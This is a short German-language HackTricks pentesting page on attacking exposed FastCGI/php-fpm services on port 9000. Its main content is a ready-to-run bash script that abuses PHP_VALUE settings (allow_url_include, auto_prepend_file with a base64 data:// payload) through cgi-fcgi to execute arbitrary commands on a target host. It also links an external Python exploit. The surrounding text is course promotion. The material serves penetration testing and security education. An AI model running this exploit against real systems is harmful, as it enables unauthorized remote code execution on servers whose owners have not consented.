9000 - Pentesting FastCGI

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Grundlegende Informationen

Wenn Sie wissen möchten, was FastCGI ist, lesen Sie die folgende Seite:

pagedisable_functions bypass - php-fpm/FastCGI

Standardmäßig läuft FastCGI auf Port 9000 und wird von nmap nicht erkannt. Normalerweise hört FastCGI nur auf localhost.

RCE

Es ist ziemlich einfach, FastCGI dazu zu bringen, beliebigen Code auszuführen:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/public/index.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT
done

Oder Sie können auch das folgende Python-Skript verwenden: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Last updated